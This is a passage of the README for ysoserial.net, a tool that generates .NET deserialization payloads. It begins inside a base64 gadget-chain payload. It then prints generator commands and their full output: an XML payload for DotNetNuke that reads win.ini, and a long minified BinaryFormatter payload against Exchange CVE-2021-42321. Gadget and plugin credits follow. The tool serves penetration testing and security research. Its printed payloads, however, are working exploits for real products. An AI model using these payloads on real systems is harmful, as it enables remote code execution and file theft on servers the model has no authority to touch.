tLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgsAAACwAlN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBg0AAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQYOAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzBg8AAAAFU3RhcnQJEAAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQkPAAAACQ0AAAAJDgAAAAYUAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhUAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEKAAAACQAAAAYWAAAAB0NvbXBhcmUJDAAAAAYYAAAADVN5c3RlbS5TdHJpbmcGGQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhoAAAAyU3lzdGVtLkludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEQAAAACAAAAAYbAAAAcVN5c3RlbS5Db21wYXJpc29uYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCQwAAAAKCQwAAAAJGAAAAAkWAAAACgs=</anyType></MethodParameters><ObjectInstance xsi:type="ObjectStateFormatter"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>

Generate a read_file payload for DotNetNuke using its plugin

$ ./ysoserial.exe -p DotNetNuke -m read_file -f win.ini

<profile><item key="name1: key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>

Generate a minified BinaryFormatter payload to exploit Exchange CVE-2021-42321 using the ActivitySurrogateDisableTypeCheck gadget inside the ClaimsPrincipal gadget.

> .\ysoserial.exe -g ClaimsPrincipal -f BinaryFormatter -c foobar -bgc ActivitySurrogateDisableTypeCheck --minify --ust

AAEAAAD/////AQAAAAAAAAAEAQAAACZTeXN0ZW0uU2VjdXJpdHkuQ2xhaW1zLkNsYWltc1ByaW5jaXBhbAEAAAAcbV9zZXJpYWxpemVkQ2xhaW1zSWRlbnRpdGllcwEGBQAAAKgfQUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFFWlRlWE4wWlcwc1ZtVnljMmx2YmowMExqQXVNQzR3TEVOMWJIUjFjbVU5Ym1WMWRISmhiQ3hRZFdKc2FXTkxaWGxVYjJ0bGJqMWlOemRoTldNMU5qRTVNelJsTURnNUJRRUFBQUJBVTNsemRHVnRMa052Ykd4bFkzUnBiMjV6TGtkbGJtVnlhV011VTI5eWRHVmtVMlYwWURGYlcxTjVjM1JsYlM1VGRISnBibWNzYlhOamIzSnNhV0pkWFFRQUFBQUZRMjkxYm5RSVEyOXRjR0Z5WlhJSFZtVnljMmx2YmdWSmRHVnRjd0FEQUFZSVNWTjVjM1JsYlM1RGIyeHNaV04wYVc5dWN5NUhaVzVsY21sakxrTnZiWEJoY21semIyNURiMjF3WVhKbGNtQXhXMXRUZVhOMFpXMHVVM1J5YVc1bkxHMXpZMjl5YkdsaVhWMElBZ0FBQUFJQUFBQUpBd0FBQUFJQUFBQUpCQUFBQUFRREFBQUFTVk41YzNSbGJTNURiMnhzWldOMGFXOXVjeTVIWlc1bGNtbGpMa052YlhCaGNtbHpiMjVEYjIxd1lYSmxjbUF4VzF0VGVYTjBaVzB1VTNSeWFXNW5MRzF6WTI5eWJHbGlYVjBCQUFBQUMxOWpiMjF3WVhKcGMyOXVBeUpUZVhOMFpXMHVSR1ZzWldkaGRHVlRaWEpwWVd4cGVtRjBhVzl1U0c5c1pHVnlDUVVBQUFBUkJBQUFBQUlBQUFBR0JnQUFBQUFHQndBQUFQMExQRkpsYzI5MWNtTmxSR2xqZEdsdmJtRnllU0I0Yld4dWN6MGlhSFIwY0RvdkwzTmphR1Z0WVhNdWJXbGpjbTl6YjJaMExtTnZiUzkzYVc1bWVDOHlNREEyTDNoaGJXd3ZjSEpsYzJWdWRHRjBhVzl1SWlCNGJXeHVjenBoUFNKb2RIUndPaTh2YzJOb1pXMWhjeTV0YVdOeWIzTnZablF1WTI5dEwzZHBibVo0THpJd01EWXZlR0Z0YkNJZ2VHMXNibk02WWowaVkyeHlMVzVoYldWemNHRmpaVHBUZVhOMFpXMDdZWE56WlcxaWJIazliWE5qYjNKc2FXSWlJSGh0Ykc1ek9tTTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtOdmJtWnBaM1Z5WVhScGIyNDdZWE56WlcxaWJIazlVM2x6ZEdWdExrTnZibVpwWjNWeVlYUnBiMjRpSUhodGJHNXpPbVE5SW1Oc2NpMXVZVzFsYzNCaFkyVTZVM2x6ZEdWdExsSmxabXhsWTNScGIyNDdZWE56WlcxaWJIazliWE5qYjNKc2FXSWlQanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnWVRwTFpYazlJblI1Y0dVaUlFOWlhbVZqZEZSNWNHVTlJbnRoT2xSNWNHVWdZanBVZVhCbGZTSWdUV1YwYUc5a1RtRnRaVDBpUjJWMFZIbHdaU0krUEU5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2k1TlpYUm9iMlJRWVhKaGJXVjBaWEp6UGp4aU9sTjBjbWx1Wno1VGVYTjBaVzB1VjI5eWEyWnNiM2N1UTI5dGNHOXVaVzUwVFc5a1pXd3VRWEJ3VTJWMGRHbHVaM01zVTNsemRHVnRMbGR2Y210bWJHOTNMa052YlhCdmJtVnVkRTF2WkdWc0xGWmxjbk5wYjI0OU5DNHdMakF1TUN4RGRXeDBkWEpsUFc1bGRYUnlZV3dzVUhWaWJHbGpTMlY1Vkc5clpXNDlNekZpWmpNNE5UWmhaRE0yTkdVek5Ud3ZZanBUZEhKcGJtYytQQzlQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWEl1VFdWMGFHOWtVR0Z5WVcxbGRHVnljejQ4TDA5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2o0OFQySnFaV04wUkdGMFlWQnliM1pwWkdWeUlHRTZTMlY1UFNKbWFXVnNaQ0lnVDJKcVpXTjBTVzV6ZEdGdVkyVTlJbnRUZEdGMGFXTlNaWE52ZFhKalpTQjBlWEJsZlNJZ1RXVjBhRzlrVG1GdFpUMGlSMlYwUm1sbGJHUWlQanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWEl1VFdWMGFHOWtVR0Z5WVcxbGRHVnljejQ4WWpwVGRISnBibWMrWkdsellXSnNaVUZqZEdsMmFYUjVVM1Z5Y205bllYUmxVMlZzWldOMGIzSlVlWEJsUTJobFkyczhMMkk2VTNSeWFXNW5QanhrT2tKcGJtUnBibWRHYkdGbmN6NDBNRHd2WkRwQ2FXNWthVzVuUm14aFozTStQQzlQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWEl1VFdWMGFHOWtVR0Z5WVcxbGRHVnljejQ4TDA5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2o0OFQySnFaV04wUkdGMFlWQnliM1pwWkdWeUlHRTZTMlY1UFNKelpYUWlJRTlpYW1WamRFbHVjM1JoYm1ObFBTSjdVM1JoZEdsalVtVnpiM1Z5WTJVZ1ptbGxiR1I5SWlCTlpYUm9iMlJPWVcxbFBTSlRaWFJXWVd4MVpTSStQRTlpYW1WamRFUmhkR0ZRY205MmFXUmxjaTVOWlhSb2IyUlFZWEpoYldWMFpYSnpQanhpT2s5aWFtVmpkQzgrUEdJNlFtOXZiR1ZoYmo1MGNuVmxQQzlpT2tKdmIyeGxZVzQrUEM5UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJdVRXVjBhRzlrVUdGeVlXMWxkR1Z5Y3o0OEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNqNDhUMkpxWldOMFJHRjBZVkJ5YjNacFpHVnlJR0U2UzJWNVBTSnpaWFJOWlhSb2IyUWlJRTlpYW1WamRFbHVjM1JoYm1ObFBTSjdZVHBUZEdGMGFXTWdZenBEYjI1bWFXZDFjbUYwYVc5dVRXRnVZV2RsY2k1QmNIQlRaWFIwYVc1bmMzMGlJRTFsZEdodlpFNWhiV1U5SWxObGRDSStQRTlpYW1WamRFUmhkR0ZRY205MmFXUmxjaTVOWlhSb2IyUlFZWEpoYldWMFpYSnpQanhpT2xOMGNtbHVaejV0YVdOeWIzTnZablE2VjI5eWEyWnNiM2REYjIxd2IyNWxiblJOYjJSbGJEcEVhWE5oWW14bFFXTjBhWFpwZEhsVGRYSnliMmRoZEdWVFpXeGxZM1J2Y2xSNWNHVkRhR1ZqYXp3dllqcFRkSEpwYm1jK1BHSTZVM1J5YVc1blBuUnlkV1U4TDJJNlUzUnlhVzVuUGp3dlQySnFaV04wUkdGMFlWQnliM1pwWkdWeUxrMWxkR2h2WkZCaGNtRnRaWFJsY25NK1BDOVBZbXBsWTNSRVlYUmhVSEp2ZG1sa1pYSStQQzlTWlhOdmRYSmpaVVJwWTNScGIyNWhjbmsrQkFVQUFBQWlVM2x6ZEdWdExrUmxiR1ZuWVhSbFUyVnlhV0ZzYVhwaGRHbHZia2h2YkdSbGNnTUFBQUFJUkdWc1pXZGhkR1VIYldWMGFHOWtNQWR0WlhSb2IyUXhBd01ETUZONWMzUmxiUzVFWld4bFoyRjBaVk5sY21saGJHbDZZWFJwYjI1SWIyeGtaWElyUkdWc1pXZGhkR1ZGYm5SeWVTOVRlWE4wWlcwdVVtVm1iR1ZqZEdsdmJpNU5aVzFpWlhKSmJtWnZVMlZ5YVdGc2FYcGhkR2x2YmtodmJHUmxjaTlUZVhOMFpXMHVVbVZtYkdWamRHbHZiaTVOWlcxaVpYSkpibVp2VTJWeWFXRnNhWHBoZEdsdmJraHZiR1JsY2drSUFBQUFDUWtBQUFBSkNnQUFBQVFJQUFBQU1GTjVjM1JsYlM1RVpXeGxaMkYwWlZObGNtbGhiR2w2WVhScGIyNUliMnhrWlhJclJHVnNaV2RoZEdWRmJuUnllUWNBQUFBRWRIbHdaUWhoYzNObGJXSnNlUVowWVhKblpYUVNkR0Z5WjJWMFZIbHdaVUZ6YzJWdFlteDVEblJoY21kbGRGUjVjR1ZPWVcxbENtMWxkR2h2WkU1aGJXVU5aR1ZzWldkaGRHVkZiblJ5ZVFFQkFnRUJBUU13VTNsemRHVnRMa1JsYkdWbllYUmxVMlZ5YVdGc2FYcGhkR2x2YmtodmJHUmxjaXRFWld4bFoyRjBaVVZ1ZEhKNUJnc0FBQUF1VTNsemRHVnRMa1oxYm1OZ01sdGJVM2x6ZEdWdExsTjBjbWx1WjEwc1cxTjVjM1JsYlM1UFltcGxZM1JkWFFZTUFBQUFDRzF6WTI5eWJHbGlDZ1lOQUFBQVZWQnlaWE5sYm5SaGRHbHZia1p5WVcxbGQyOXlheXhXWlhKemFXOXVQVFF1TUM0d0xqQXNRM1ZzZEhWeVpUMXVaWFYwY21Gc0xGQjFZbXhwWTB0bGVWUnZhMlZ1UFRNeFltWXpPRFUyWVdRek5qUmxNelVHRGdBQUFDQlRlWE4wWlcwdVYybHVaRzkzY3k1TllYSnJkWEF1V0dGdGJGSmxZV1JsY2dZUEFBQUFCVkJoY25ObENSQUFBQUFFQ1FBQUFDOVRlWE4wWlcwdVVtVm1iR1ZqZEdsdmJpNU5aVzFpWlhKSmJtWnZVMlZ5YVdGc2FYcGhkR2x2YmtodmJHUmxjZ1lBQUFBRVRtRnRaUXhCYzNObGJXSnNlVTVoYldVSlEyeGhjM05PWVcxbENWTnBaMjVoZEhWeVpRcE5aVzFpWlhKVWVYQmxFRWRsYm1WeWFXTkJjbWQxYldWdWRITUJBUUVCQUFNSURWTjVjM1JsYlM1VWVYQmxXMTBKRHdBQUFBa05BQUFBQ1E0QUFBQUdGQUFBQUNKVGVYTjBaVzB1VDJKcVpXTjBJRkJoY25ObEtGTjVjM1JsYlM1VGRISnBibWNwQ0FBQUFBb0JDZ0FBQUFrQUFBQUdGUUFBQUFkRGIyMXdZWEpsQ1F3QUFBQUdGd0FBQUExVGVYTjBaVzB1VTNSeWFXNW5CaGdBQUFBclNXNTBNeklnUTI5dGNHRnlaU2hUZVhOMFpXMHVVM1J5YVc1bkxDQlRlWE4wWlcwdVUzUnlhVzVuS1FnQUFBQUtBUkFBQUFBSUFBQUFCaGtBQUFBa1UzbHpkR1Z0TGtOdmJYQmhjbWx6YjI1Z01WdGJVM2x6ZEdWdExsTjBjbWx1WjExZENRd0FBQUFLQ1F3QUFBQUpGd0FBQUFrVkFBQUFDZ3M9Cw==

v2 Branch

v2 branch is a copy of ysoserial.net (15/03/2018) that has been changed to work with .NET Framework 2.0 by irsdl. Although this project can be used with applications that use .NET Framework v2.0, it also requires .NET Framework 3.5 to be installed on the target box as the gadgets depend on it. This problem will be resolved if new gadgets in .NET Framework 2.0 become identified in the future.

Contributing

  • Fork it
  • Create your feature branch (git checkout -b my-new-feature)
  • Commit your changes (git commit -am 'Add some feature')
  • Push to the branch (git push origin my-new-feature)
  • Create new Pull Request

Thanks

Special thanks to all contributors:

Credits

$ ./ysoserial.exe --credit

ysoserial.net has been originally developed by Alvaro Munoz (@pwntester)
this tool is being maintained by Soroush Dalili (@irsdl) and Alvaro Munoz (@pwntester) 

Credits for available gadgets:
	ActivitySurrogateDisableTypeCheck
		[Finders: Nick Landers]
	ActivitySurrogateSelector
		[Finders: James Forshaw] [Contributors: Alvaro Munoz, zcgonvh]
	ActivitySurrogateSelectorFromFile
		[Finders: James Forshaw] [Contributors: Alvaro Munoz, zcgonvh]
	AxHostState
		[Finders: Soroush Dalili]
	ClaimsIdentity
		[Finders: Soroush Dalili]
	ClaimsPrincipal
		[Finders: jang]
	DataSet
		[Finders: James Forshaw] [Contributors: Soroush Dalili]
	DataSetOldBehaviour
		[Finders: Steven Seeley] [Contributors: Soroush Dalili]
	DataSetOldBehaviourFromFile
		[Finders: Steven Seeley, Markus Wulftange] [Contributors: Soroush Dalili]
	DataSetTypeSpoof
		[Finders: James Forshaw] [Contributors: Soroush Dalili, Markus Wulftange, Jang]
	GenericPrincipal
		[Finders: Soroush Dalili]
	ObjectDataProvider
		[Finders: Oleksandr Mirosh, Alvaro Munoz] [Contributors: Alvaro Munoz, Soroush Dalili, Dane Evans]
	ObjRef
		[Finders: Markus Wulftange]
	PSObject
		[Finders: Oleksandr Mirosh, Alvaro Munoz] [Contributors: Alvaro Munoz]
	ResourceSet
		[Finders: Soroush Dalili]
	RolePrincipal
		[Finders: Soroush Dalili]
	SessionSecurityToken
		[Finders: @mufinnnnnnn, Soroush Dalili] [Contributors: Soroush Dalili]
	SessionViewStateHistoryItem
		[Finders: Soroush Dalili]
	TextFormattingRunProperties
		[Finders: Oleksandr Mirosh and Alvaro Munoz] [Contributors: Oleksandr Mirosh, Soroush Dalili]
	ToolboxItemContainer
		[Finders: @frycos]
	TypeConfuseDelegate
		[Finders: James Forshaw] [Contributors: Alvaro Munoz]
	TypeConfuseDelegateMono
		[Finders: James Forshaw] [Contributors: Denis Andzakovic, Soroush Dalili]
	WindowsClaimsIdentity
		[Finders: Soroush Dalili]
	WindowsIdentity
		[Finders: Levi Broderick] [Contributors: Alvaro Munoz, Soroush Dalili]
	WindowsPrincipal
		[Finders: Steven Seeley of Qihoo 360 Vulcan Team] [Contributors: Chris Anastasio]

Credits for available plugins:
	ActivatorUrl
		Harrison Neal
	Altserialization
		Soroush Dalili
	ApplicationTrust
		Soroush Dalili
	Clipboard
		Soroush Dalili
	DotNetNuke
		discovered by Oleksandr Mirosh and Alvaro Munoz, implemented by Alvaro Munoz, tested by @GlitchWitch
	Resx
		Soroush Dalili
	SessionSecurityTokenHandler
		Soroush Dalili
	SharePoint
		CVE-2018-8421: Soroush Dalili, CVE-2019-0604: Markus Wulftange, CVE-2020-1147: Oleksandr Mirosh, Markus Wulftange, Jonathan Birch, Steven Seeley (write-up)  - implemented by Soroush Dalili
	TransactionManagerReenlist
		Soroush Dalili
	ViewState
		Soroush Dalili

Various other people have also donated their time and contributed to this project.
Please see https://github.com/pwntester/ysoserial.net/graphs/contributors to find those who have helped developing more features or have fixed bugs.

Additional Reading

ysoserial.net references in the wild

Research:

Usage:

Talks:

Tools:

CTF write-ups:

About

Deserialization payload generator for a variety of .NET formatters

Resources

License

Security policy

Stars

Watchers

Forks

Packages

No packages published

Languages